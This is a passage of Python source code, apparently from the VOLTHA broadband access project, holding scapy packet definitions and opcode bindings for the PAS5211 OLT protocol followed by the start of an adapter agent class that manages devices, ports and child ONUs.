ConditionalField(PacketField("frame", None, OmciFrame), lambda pkt: pkt.management_frame==PON_TRUE)
]
class PAS5211EventDbaAlgorithm(PAS5211Event):
name = "PAS5211EventDbaAlgorithm"
fields_desc = [
FieldLenField("size", None, fmt="<H", length_of="data"),
StrLenField("data", "", length_from=lambda x: x.size)
]
class PAS5211EventOnuActivation(PAS5211Event):
name = "PAS5211EventOnuActivation"
fields_desc = [
StrFixedLenField("serial_number", None, length=8),
LEIntField("equalization_period", None)
]
class PAS5211Dot3(Packet):
name = "PAS5211Dot3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
MIN_FRAME_SIZE = 60
def post_build(self, pkt, payload):
pkt += payload
size = ord(payload[4]) + (ord(payload[5]) << 8)
        length = size + 6  # this is an idiosyncrasy of the PASCOMM protocol
pkt = pkt[:12] + chr(length >> 8) + chr(length & 0xff) + pkt[14:]
padding = self.MIN_FRAME_SIZE - len(pkt)
if padding > 0:
pkt = pkt + ("\x00" * padding)
return pkt
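    # Worked example of the length fix-up above (illustrative byte values): if
    # the PASCOMM payload carries size bytes 0x2a 0x00 at offsets 4-5, then
    # size = 0x2a + (0x00 << 8) = 42 and length = 42 + 6 = 48, written
    # big-endian into the 802.3 "len" field at bytes 12-13 before the frame is
    # zero-padded up to MIN_FRAME_SIZE (60) bytes.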
'''
This is needed in order to force scapy to use PAS5211Dot3
instead of the default Dot3 that the Ether class uses.
'''
@classmethod
def PAS_dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return PAS5211Dot3
return cls
Ether.dispatch_hook = PAS_dispatch_hook
# bindings for messages received
# fix for v2 of Microsemi OLT.
bind_layers(Ether, PAS5211FrameHeader, type=0x0a00)
bind_layers(PAS5211Dot3, PAS5211FrameHeader)
bind_layers(PAS5211FrameHeader, PAS5211MsgHeader)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetProtocolVersion, opcode=0x3000 | 2)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetProtocolVersionResponse, opcode=0x2800 | 2)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOltVersion, opcode=0x3000 | 3)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOltVersionResponse, opcode=0x3800 | 3)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltOptics, opcode=0x3000 | 106)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltOpticsResponse, opcode=0x2800 | 106)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOpticsIoControl, opcode=0x3000 | 108)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOpticsIoControlResponse, opcode=0x2800 | 108)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetGeneralParam, opcode=0x3000 | 164)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetGeneralParamResponse, opcode=0x2800 | 164)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetGeneralParam, opcode=0x3000 | 165)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetGeneralParamResponse, opcode=0x2800 | 165)
bind_layers(PAS5211MsgHeader, PAS5211MsgAddOltChannel, opcode=0x3000 | 4)
bind_layers(PAS5211MsgHeader, PAS5211MsgAddOltChannelResponse, opcode=0x2800 | 4)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetAlarmConfig, opcode=0x3000 | 48)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetAlarmConfigResponse, opcode=0x2800 | 48)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltChannelActivationPeriod, opcode=0x3000 | 11)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltChannelActivationPeriodResponse, opcode=0x2800 | 11)
bind_layers(PAS5211MsgHeader, PAS5211MsgStartDbaAlgorithm, opcode=0x3000 | 55)
bind_layers(PAS5211MsgHeader, PAS5211MsgStartDbaAlgorithmResponse, opcode=0x2800 | 55)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetDbaMode, opcode=0x3000 | 57)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetDbaModeResponse, opcode=0x2800 | 57)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendFrame, opcode=0x3000 | 42)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendFrameResponse, opcode=0x2800 | 42)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetActivationAuthMode, opcode=0x3000 | 145)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetActivationAuthModeResponse, opcode=0x2800 | 145)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuOmciPortId, opcode=0x3000 | 41)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuOmciPortIdResponse, opcode=0x2800 | 41)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetLogicalObjectStatus, opcode=0x3000 | 223)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetLogicalObjectStatusResponse, opcode=0x2800 | 223)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuAllocId, opcode=0x3000 | 8)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuAllocIdResponse, opcode=0x2800 | 8)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendDbaAlgorithmMsg, opcode=0x3000 | 47)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendDbaAlgorithmMsgResponse, opcode=0x2800 | 47)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetPortIdConfig, opcode=0x3000 | 18)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetPortIdConfigResponse, opcode=0x2800 | 18)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOnuIdByPortId, opcode=0x3000 | 196)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOnuIdByPortIdResponse, opcode=0x2800 | 196)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanUplinkConfiguration, opcode=0x3000 | 39)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanUplinkConfigurationResponse, opcode=0x2800 | 39)
bind_layers(PAS5211MsgHeader, PAS5211GetOnuAllocs, opcode=0x3000 | 9)
bind_layers(PAS5211MsgHeader, PAS5211GetOnuAllocsResponse, opcode=0x2800 | 9)
bind_layers(PAS5211MsgHeader, PAS5211GetSnInfo, opcode=0x3000 | 7)
bind_layers(PAS5211MsgHeader, PAS5211GetSnInfoResponse, opcode=0x2800 | 7)
bind_layers(PAS5211MsgHeader, PAS5211GetOnusRange, opcode=0x3000 | 116)
bind_layers(PAS5211MsgHeader, PAS5211GetOnusRangeResponse, opcode=0x2800 | 116)
bind_layers(PAS5211MsgHeader, PAS5211GetPortIdConfig, opcode=0x3000 | 19)
bind_layers(PAS5211MsgHeader, PAS5211GetPortIdConfigResponse, opcode=0x2800 | 19)
bind_layers(PAS5211MsgHeader, PAS5211SetSVlanAtConfig, opcode=0x3000 | 63)
bind_layers(PAS5211MsgHeader, PAS5211SetSVlanAtConfigResponse, opcode=0x2800 | 63)
bind_layers(PAS5211MsgHeader, PAS5211SetUplinkVlanHandl, opcode=0x3000 | 34)
bind_layers(PAS5211MsgHeader, PAS5211SetUplinkVlanHandlResponse, opcode=0x2800 | 34)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanGenConfig, opcode=0x3000 | 43)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanGenConfigResponse, opcode=0x2800 | 43)
# bindings for events received
bind_layers(PAS5211MsgHeader, PAS5211EventOnuActivation, opcode=0x2800 | 12, event_type=1)
bind_layers(PAS5211MsgHeader, PAS5211EventFrameReceived, opcode=0x2800 | 12, event_type=10)
bind_layers(PAS5211MsgHeader, PAS5211EventDbaAlgorithm, opcode=0x2800 | 12, event_type=11)
bind_layers(PAS5211MsgHeader, PAS5211Event, opcode=0x2800 | 12)
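# Illustrative note on the opcode scheme used by the bindings above: requests
# are bound at 0x3000 | message_code and responses at 0x2800 | message_code.
# For example, StartDbaAlgorithm (code 55) binds its request at
# 0x3000 | 55 == 12343 and its response at 0x2800 | 55 == 10295, which matches
# the opcode declared on PAS5211MsgStartDbaAlgorithmResponse. Events all share
# opcode 0x2800 | 12 and are demultiplexed further by event_type.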
class Display(object):
def __init__(self, pkts):
self.pkts = pkts
def show(self, seq):
self.pkts[seq].show()
def __getitem__(self, key):
self.show(key)
def walk(self, index=0):
while index < len(self.pkts):
self.show(index)
try:
input("(current packet - %s) Next packet?" % index)
except Exception as e:
pass
index += 1
if __name__ == '__main__':
from scapy.utils import rdpcap
import sys
import code
packets = rdpcap(sys.argv[1])
p = Display(packets)
def walk(index=0):
p.walk(index=index)
code.interact(local=locals())
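    # Usage sketch (the module and capture file names below are hypothetical):
    #   python pas5211_msg_dump.py olt_capture.pcap
    #   >>> walk()      # step through the decoded frames one at a time
    #   >>> p[3]        # pretty-print packet number 3 via Display.__getitem__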
```
#### File: voltha/core/adapter_agent.py
```python
from uuid import uuid4
import arrow
import structlog
from google.protobuf.json_format import MessageToJson
from scapy.packet import Packet
from twisted.internet.defer import inlineCallbacks, returnValue
from zope.interface import implementer
from common.event_bus import EventBusClient
from common.frameio.frameio import hexify
from common.utils.id_generation import create_cluster_logical_device_ids
from voltha.adapters.interface import IAdapterAgent
from voltha.protos import third_party
from voltha.core.flow_decomposer import OUTPUT
from voltha.protos.device_pb2 import Device, Port, PmConfigs
from voltha.protos.events_pb2 import AlarmEvent, AlarmEventType, \
AlarmEventSeverity, AlarmEventState, AlarmEventCategory
from voltha.protos.events_pb2 import KpiEvent
from voltha.protos.voltha_pb2 import DeviceGroup, LogicalDevice, \
LogicalPort, AdminState, OperStatus, AlarmFilterRuleKey
from voltha.registry import registry
from common.utils.id_generation import create_cluster_device_id
import re
class MacAddressError(BaseException):
def __init__(self, error):
self.error = error
class IDError(BaseException):
def __init__(self, error):
self.error = error
@implementer(IAdapterAgent)
class AdapterAgent(object):
"""
Gate-keeper between CORE and device adapters.
On one side it interacts with Core's internal model and update/dispatch
mechanisms.
    On the other side, it interacts with the adapters' standard interface, as
    defined in voltha.adapters.interface.
"""
def __init__(self, adapter_name, adapter_cls):
self.adapter_name = adapter_name
self.adapter_cls = adapter_cls
self.core = registry('core')
self.adapter = None
self.adapter_node_proxy = None
self.root_proxy = self.core.get_proxy('/')
self._rx_event_subscriptions = {}
self._tx_event_subscriptions = {}
self.event_bus = EventBusClient()
self.packet_out_subscription = None
self.log = structlog.get_logger(adapter_name=adapter_name)
self._onu_detect_event_subscriptions = {}
@inlineCallbacks
def start(self):
self.log.debug('starting')
config = self._get_adapter_config() # this may be None
try:
adapter = self.adapter_cls(self, config)
yield adapter.start()
self.adapter = adapter
self.adapter_node_proxy = self._update_adapter_node()
self._update_device_types()
except Exception, e:
self.log.exception(e)
self.log.info('started')
returnValue(self)
@inlineCallbacks
def stop(self):
self.log.debug('stopping')
if self.adapter is not None:
yield self.adapter.stop()
self.adapter = None
self.log.info('stopped')
def _get_adapter_config(self):
"""
Opportunistically load persisted adapter configuration.
Return None if no configuration exists yet.
"""
proxy = self.core.get_proxy('/')
try:
config = proxy.get('/adapters/' + self.adapter_name)
return config
except KeyError:
return None
def _update_adapter_node(self):
"""
Creates or updates the adapter node object based on self
description from the adapter.
"""
adapter_desc = self.adapter.adapter_descriptor()
assert adapter_desc.id == self.adapter_name
path = self._make_up_to_date(
'/adapters', self.adapter_name, adapter_desc)
return self.core.get_proxy(path)
def _update_device_types(self):
"""
Make sure device types are registered in Core
"""
device_types = self.adapter.device_types()
for device_type in device_types.items:
key = device_type.id
self._make_up_to_date('/device_types', key, device_type)
def _make_up_to_date(self, container_path, key, data):
full_path = container_path + '/' + str(key)
root_proxy = self.core.get_proxy('/')
try:
root_proxy.get(full_path)
root_proxy.update(full_path, data)
except KeyError:
root_proxy.add(container_path, data)
return full_path
def _remove_node(self, container_path, key):
"""
Remove a node from the data model
:param container_path: path to node
:param key: node
:return: None
"""
full_path = container_path + '/' + str(key)
root_proxy = self.core.get_proxy('/')
try:
root_proxy.get(full_path)
root_proxy.remove(full_path)
except KeyError:
# Node does not exist
pass
# ~~~~~~~~~~~~~~~~~~~~~ Core-Facing Service ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def adopt_device(self, device):
return self.adapter.adopt_device(device)
def reconcile_device(self, device):
return self.adapter.reconcile_device(device)
def abandon_device(self, device):
return self.adapter.abandon_device(device)
def disable_device(self, device):
return self.adapter.disable_device(device)
def reenable_device(self, device):
return self.adapter.reenable_device(device)
def reboot_device(self, device):
return self.adapter.reboot_device(device)
def download_image(self, device, request):
return self.adapter.download_image(device, request)
def get_image_download_status(self, device, request):
return self.adapter.get_image_download_status(device, request)
def cancel_image_download(self, device, request):
return self.adapter.cancel_image_download(device, request)
def activate_image_update(self, device, request):
return self.adapter.activate_image_update(device, request)
def revert_image_update(self, device, request):
return self.adapter.revert_image_update(device, request)
def self_test(self, device):
return self.adapter.self_test_device(device)
def delete_device(self, device):
return self.adapter.delete_device(device)
def get_device_details(self, device):
return self.adapter.get_device_details(device)
def update_flows_bulk(self, device, flows, groups):
return self.adapter.update_flows_bulk(device, flows, groups)
    def update_flows_incrementally(self, device, flow_changes, group_changes):
        return self.adapter.update_flows_incrementally(
            device, flow_changes, group_changes)
def suppress_alarm(self, filter):
return self.adapter.suppress_alarm(filter)
def unsuppress_alarm(self, filter):
return self.adapter.unsuppress_alarm(filter)
# def update_pm_collection(self, device, pm_collection_config):
# return self.adapter.update_pm_collection(device, pm_collection_config)
def create_interface(self, device, data):
return self.adapter.create_interface(device, data)
def update_interface(self, device, data):
return self.adapter.update_interface(device, data)
def remove_interface(self, device, data):
return self.adapter.remove_interface(device, data)
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.create_tcont(device, tcont_data,
traffic_descriptor_data)
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.update_tcont(device, tcont_data,
traffic_descriptor_data)
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.remove_tcont(device, tcont_data,
traffic_descriptor_data)
def create_gemport(self, device, data):
return self.adapter.create_gemport(device, data)
def update_gemport(self, device, data):
return self.adapter.update_gemport(device, data)
def remove_gemport(self, device, data):
return self.adapter.remove_gemport(device, data)
def create_multicast_gemport(self, device, data):
return self.adapter.create_multicast_gemport(device, data)
def update_multicast_gemport(self, device, data):
return self.adapter.update_multicast_gemport(device, data)
def remove_multicast_gemport(self, device, data):
return self.adapter.remove_multicast_gemport(device, data)
def create_multicast_distribution_set(self, device, data):
return self.adapter.create_multicast_distribution_set(device, data)
def update_multicast_distribution_set(self, device, data):
return self.adapter.update_multicast_distribution_set(device, data)
def remove_multicast_distribution_set(self, device, data):
return self.adapter.remove_multicast_distribution_set(device, data)
# ~~~~~~~~~~~~~~~~~~~ Adapter-Facing Service ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def get_device(self, device_id):
return self.root_proxy.get('/devices/{}'.format(device_id))
def get_child_device(self, parent_device_id, **kwargs):
"""
Retrieve a child device object belonging
to the specified parent device based on some match
criteria. The first child device that matches the
provided criteria is returned.
:param parent_device_id: parent's device id
:param **kwargs: arbitrary list of match criteria
:return: Child Device Object or None
"""
# Get all arguments to be used for comparison
# Note that for now we are only matching on the ONU ID & SERIAL NUMBER
# Other matching fields can be added as required in the future
onu_id = kwargs.pop('onu_id', None)
serial_number = kwargs.pop('serial_number', None)
if onu_id is None and serial_number is None: return None
# Get all devices
devices = self.root_proxy.get('/devices')
# Get all child devices with the same parent ID
children_ids = set(
d.id for d in devices if d.parent_id == parent_device_id)
# Loop through all the child devices with this parent ID
for child_id in children_ids:
found = True
device = self.get_device(child_id)
# Does this child device match the passed in ONU ID?
found_onu_id = False
if onu_id is not None:
if device.proxy_address.onu_id == onu_id:
found_onu_id = True
# Does this child device match the passed in SERIAL NUMBER?
found_serial_number = False
if serial_number is not None:
if device.serial_number == serial_number:
found_serial_number = True
# Match ONU ID and SERIAL NUMBER
if onu_id is not None and serial_number is not None:
found = found_onu_id & found_serial_number
# Otherwise ONU ID or SERIAL NUMBER
else:
found = found_onu_id | found_serial_number
# Return the matched child device
if found is True:
return device
return None
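    # Hypothetical usage of get_child_device (values are illustrative only):
    #   onu = agent.get_child_device(olt_device_id, onu_id=1,
    #                                serial_number='PMCS00000001')
    # The first child device matching the supplied ONU ID and/or serial number
    # is returned; None is returned when neither criterion is supplied or when
    # nothing matches.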
def add_device(self, device):
assert isinstance(device, Device)
self._make_up_to_date('/devices', device.id, device)
        # Ultimately, assign devices to device groups.
# see https://jira.opencord.org/browse/CORD-838
dg = DeviceGroup(id='1')
self._make_up_to_date('/device_groups', dg.id, dg)
# add device to device group
# see https://jira.opencord.org/browse/CORD-838
def update_device(self, device):
assert isinstance(device, Device)
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(device.id)
device_agent.update_device(device)
def update_device_pm_config(self, device_pm_config, init=False):
assert isinstance(device_pm_config, PmConfigs)
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(device_pm_config.id)
device_agent.update_device_pm_config(device_pm_config, init)
def update_adapter_pm_config(self, device_id, device_pm_config):
device = self.get_device(device_id)
self.adapter.update_pm_config(device, device_pm_config)
def update_image_download(self, img_dnld):
self.log.info('update-image-download', img_dnld=img_dnld)
try:
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(img_dnld.id)
device_agent.update_device_image_download(img_dnld)
except Exception as e:
self.log.exception(e.message)
def delete_image_download(self, img_dnld):
self.log.info('delete-image-download', img_dnld=img_dnld)
try:
root_proxy = self.core.get_proxy('/')
path = '/devices/{}/image_downloads/{}'. \
format(img_dnld.id, img_dnld.name)
root_proxy.get(path)
root_proxy.remove(path)
device_agent = self.core.get_device_agent(img_dnld.id)
device_agent.unregister_device_image_download(img_dnld.name)
except Exception as e:
self.log.exception(e.message)
def _add_peer_reference(self, device_id, port):
# for referential integrity, add/augment references
port.device_id = device_id
me_as_peer = Port.PeerPort(device_id=device_id, port_no=port.port_no)
for peer in port.peers:
peer_port_path = '/devices/{}/ports/{}'.format(
peer.device_id, peer.port_no)
peer_port = self.root_proxy.get(peer_port_path)
if me_as_peer not in peer_port.peers:
new = peer_port.peers.add()
new.CopyFrom(me_as_peer)
self.root_proxy.update(peer_port_path, peer_port)
def _del_peer_reference(self, device_id, port):
me_as_peer = Port.PeerPort(device_id=device_id, port_no=port.port_no)
for peer in port.peers:
peer_port_path = '/devices/{}/ports/{}'.format(
peer.device_id, peer.port_no)
peer_port = self.root_proxy.get(peer_port_path)
if me_as_peer in peer_port.peers:
peer_port.peers.remove(me_as_peer)
self.root_proxy.update(peer_port_path, peer_port)
def add_port(self, device_id, port):
assert isinstance(port, Port)
# for referential integrity, add/augment references
self._add_peer_reference(device_id, port)
# Add port
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def get_ports(self, device_id, port_type):
# assert Port.PortType.DESCRIPTOR.values_by_name[port_type]
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
return [p for p in ports if p.type == port_type]
def delete_port(self, device_id, port):
assert isinstance(port, Port)
# for referential integrity, add/augment references
self._del_peer_reference(device_id, port)
# Delete port
self._remove_node('/devices/{}/ports'.format(device_id), port.port_no)
def disable_all_ports(self, device_id):
"""
Disable all ports on that device, i.e. change the admin status to
disable and operational status to UNKNOWN.
:param device_id: device id
:return: None
"""
# get all device ports
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.admin_state = AdminState.DISABLED
port.oper_status = OperStatus.UNKNOWN
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def enable_all_ports(self, device_id):
"""
Re-enable all ports on that device, i.e. change the admin status to
enabled and operational status to ACTIVE
:param device_id: device id
:return: None
"""
# get all device ports
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.admin_state = AdminState.ENABLED
port.oper_status = OperStatus.ACTIVE
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def update_operstatus_all_ports(self, device_id, oper_status):
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.oper_status = oper_status
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def delete_all_peer_references(self, device_id):
"""
Remove all peer port references for that device
:param device_id: device_id of device
:return: None
"""
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port_path = '/devices/{}/ports/{}'.format(device_id, port.port_no)
for peer in port.peers:
port.peers.remove(peer)
self.root_proxy.update(port_path, port)
def delete_port_reference_from_parent(self, device_id, port):
"""
Delete the port reference from the parent device
:param device_id: id of device containing the port
:param port: port to remove
:return: None
"""
assert isinstance(port, Port)
self.log.info('delete-port-reference', device_id=device_id, port=port)
self._del_peer_reference(device_id, port)
# update child port details
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def add_port_reference_to_parent(self, device_id, port):
"""
Add the port reference to the parent device
:param device_id: id of device containing the port
:param port: port to add
:return: None
"""
assert isinstance(port, Port)
self.log.info('add-port-reference', device_id=device_id, port=port)
self._add_peer_reference(device_id, port)
# update child port details
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def get_logical_device(self, logical_device_id):
return self.root_proxy.get('/logical_devices/{}'.format(
logical_device_id))
def get_logical_port(self, logical_device_id, port_id):
return self.root_proxy.get('/logical_devices/{}/ports/{}'.format(
logical_device_id, port_id))
def _create_cluster_ids_from_dpid(self, dpid):
"""
Create a logical device id using a datapath id.
:param dpid: Must be present and formatted as a mac address
:return: a unique logical device id and a formatted datapath id. If
the dpid was already registered then an exception will be raised.
"""
switch_id = int(dpid.replace(':', ''), 16)
logical_devices = self.root_proxy.get('/logical_devices')
existing_ids = set(ld.id for ld in logical_devices)
existing_datapath_ids = set(ld.datapath_id for ld in logical_devices)
core_id = registry('core').core_store_id
ld_id, dp_id = create_cluster_logical_device_ids(core_id, switch_id)
ids_exist = dp_id in existing_datapath_ids or \
ld_id in existing_ids
if not ids_exist:
return ld_id, dp_id
else:
self.log.error('ID-already-registered', logical_id=ld_id,
dpid=dpid)
raise IDError('ID-already-registered')
def _is_valid_mac_address(self, data):
return re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$",
data)
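    # Illustrative sketch of the dpid handling above (the address value is
    # hypothetical):
    #   dpid = '00:0c:e2:31:05:00'                  # must look like a MAC
    #   switch_id = int(dpid.replace(':', ''), 16)  # -> 0x000ce2310500
    # create_cluster_logical_device_ids(core_id, switch_id) then derives a
    # unique logical device id and datapath id for this core.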
def create_logical_device(self, logical_device, dpid=None):
"""
Allow the adapters to provide their own datapath id. This must
be the OLT MAC address. If the dpid is None or is not a mac
address then an exception will be raised.
:param logical_device: logical device
:param dpid: OLT MAC address. dpid default param is None just to be
backward compatible with existing adapters.
:return: updated logical device
"""
assert isinstance(logical_device, LogicalDevice)
# Validate the dpid - it needs to be present and formatted as a mac
# address
if dpid:
dpid = dpid.lower()
if not self._is_valid_mac_address(dpid):
self.log.error('DPID-not-a-mac-address', dpid=dpid)
raise MacAddressError('DPID-not-a-mac-address')
else:
self.log.error('DPID-cannot-be-none')
raise MacAddressError("DPID-cannot-be-none")
if not logical_device.id:
ld_id, dp_id = self._create_cluster_ids_from_dpid(dpid)
logical_device.id = ld_id
logical_device.datapath_id = dp_id
self._make_up_to_date('/logical_devices',
logical_device.id, logical_device)
# Keep a reference to the packet out subscription as it will be
        # referred to during removal
self.packet_out_subscription = self.event_bus.subscribe(
topic='packet-out:{}'.format(logical_device.id),
callback=lambda _, p: self.receive_packet_out(logical_device.id, p)
)
return logical_device
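    # Hypothetical call (illustrative values): an OLT adapter would typically
    # build a LogicalDevice protobuf and then do
    #   ld = adapter_agent.create_logical_device(ld, dpid='00:0c:e2:31:05:00')
    # where dpid is the OLT MAC address; passing None or a malformed value
    # raises MacAddressError, as enforced above.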
def reconcile_logical_device(self, logical_device_id):
"""
This is called by the adapter to reconcile the physical device with
the logical device. For now, we only set the packet-out subscription
:param logical_device_id:
:return:
"""
# Keep a reference to the packet out subscription as it will be
        # referred to during removal
self.packet_out_subscription = self.event_bus.subscribe(
topic='packet-out:{}'.format(logical_device_id),
callback=lambda _, p: self.receive_packet_out(logical_device_id, p)
)
def delete_logical_device(self, logical_device):
"""
This will remove the logical device as well as all logical ports
associated with it
:param logical_device: The logical device to remove
:return: None
"""
assert isinstance(logical_device, LogicalDevice)
# Remove packet out subscription
self.event_bus.unsubscribe(self.packet_out_subscription)
# Remove node from the data model - this will trigger the logical
# device 'remove callbacks' as well as logical ports 'remove
# callbacks' if present
self._remove_node('/logical_devices', logical_device.id)
def receive_packet_out(self, logical_device_id, ofp_packet_out):
def get_port_out(opo):
for action in opo.actions:
if action.type == OUTPUT:
return action.output.port
out_port = get_port_out(ofp_packet_out)
frame = ofp_packet_out.data
self.adapter.receive_packet_out(logical_device_id, out_port, frame)
def add_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self._make_up_to_date(
'/logical_devices/{}/ports'.format(logical_device_id),
port.id, port)
def delete_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self._remove_node('/logical_devices/{}/ports'.format(
logical_device_id), port.id)
def delete_logical_port_by_id(self, logical_device_id, port_id):
self._remove_node('/logical_devices/{}/ports'.format(
logical_device_id), port_id)
def update_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self.log.debug('update-logical-port',
logical_device_id=logical_device_id,
port=port)
self._make_up_to_date(
'/logical_devices/{}/ports'.format(logical_device_id),
port.id, port)
def get_child_devices(self, parent_device_id):
try:
devices = self.root_proxy.get('/devices')
children = [d for d in devices if d.parent_id == parent_device_id]
return children
except Exception, e:
self.log.exception('failure', e=e)
def subscribe_to_proxy_child_messages(self, proxy_address):
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def reconcile_child_devices(self, parent_device_id):
children = self.get_child_devices(parent_device_id)
for child in children:
            # First subscribe to proxy messages from a child device
self.subscribe_to_proxy_child_messages(child.proxy_address)
# Then trigger the reconciliation of the existing child device
device_agent = self.core.get_device_agent(child.id)
device_agent.reconcile_existing_device(child)
    # Obsolete API - deprecated and to be decommissioned once
    # adapters are aligned to the new APIs
def child_device_detected(self,
parent_device_id,
parent_port_no,
child_device_type,
proxy_address,
admin_state,
**kw):
# we create new ONU device objects and insert them into the config
device = Device(
id=create_cluster_device_id(self.core.core_store_id),
# id=uuid4().hex[:12],
type=child_device_type,
parent_id=parent_device_id,
parent_port_no=parent_port_no,
proxy_address=proxy_address,
admin_state=admin_state,
**kw
)
self._make_up_to_date(
'/devices', device.id, device)
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def add_onu_device(self,
parent_device_id,
parent_port_no,
vendor_id,
proxy_address,
admin_state,
**kw):
device_type = next((dt for dt in self.root_proxy.get('/device_types')
if dt.vendor_id == vendor_id and \
dt.id.endswith("_onu")), None)
# we create new ONU device objects and insert them into the config
device = Device(
id=create_cluster_device_id(self.core.core_store_id),
# id=uuid4().hex[:12],
type=device_type.id,
vendor_id=vendor_id,
parent_id=parent_device_id,
parent_port_no=parent_port_no,
proxy_address=proxy_address,
admin_state=admin_state,
adapter=device_type.adapter,
**kw
)
self._make_up_to_date('/devices', device.id, device)
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def get_child_device_with_proxy_address(self, proxy_address):
# Proxy address is defined as {parent id, channel_id}
devices = self.root_proxy.get('/devices')
children_ids = set(d.id for d in devices if d.parent_id ==
proxy_address.device_id)
for child_id in children_ids:
device = self.get_device(child_id)
if device.proxy_address == proxy_address:
return device
def remove_all_logical_ports(self, logical_device_id):
""" Remove all logical ports from a given logical device"""
        ports = self.root_proxy.get(
            '/logical_devices/{}/ports'.format(logical_device_id))
        for port in ports:
            self._remove_node('/logical_devices/{}/ports'.format(
                logical_device_id), port.id)
def delete_all_child_devices(self, parent_device_id):
""" Remove all ONUs from a given OLT """
devices = self.root_proxy.get('/devices')
children_ids = set()
for device in devices:
if device.parent_id == parent_device_id:
children_ids.add(device.id)
topic = self._gen_tx_proxy_address_topic(device.proxy_address)
self.event_bus.unsubscribe(self._tx_event_subscriptions[topic])
del self._tx_event_subscriptions[topic]
self.log.debug('devices-to-delete',
parent_id=parent_device_id,
children_ids=children_ids)
for child_id in children_ids:
self._remove_node('/devices', child_id)
def update_child_devices_state(self,
parent_device_id,
oper_status=None,
connect_status=None,
admin_state=None):
""" Update status of all child devices """
devices = self.root_proxy.get('/devices')
children_ids = set(
d.id for d in devices if d.parent_id == parent_device_id)
self.log.debug('update-devices',
parent_id=parent_device_id,
children_ids=children_ids,
oper_status=oper_status,
connect_status=connect_status,
admin_state=admin_state)
for child_id in children_ids:
device = self.get_device(child_id)
if oper_status is not None:
device.oper_status = oper_status
if connect_status:
device.connect_status = connect_status
if admin_state:
device.admin_state = admin_state
self._make_up_to_date(
'/devices', device.id, device)
def delete_child_device(self, parent_device_id, child_device_id):
onu_device = self.root_proxy.get('/devices/{}'.format(child_device_id))
if onu_device is not None:
if onu_device.parent_id == parent_device_id:
self.log.debug('deleting-child-device',
parent_device_id=parent_device_id,
child_device_id=child_device_id)
topic = self._gen_tx_proxy_address_topic(
onu_device.proxy_address)
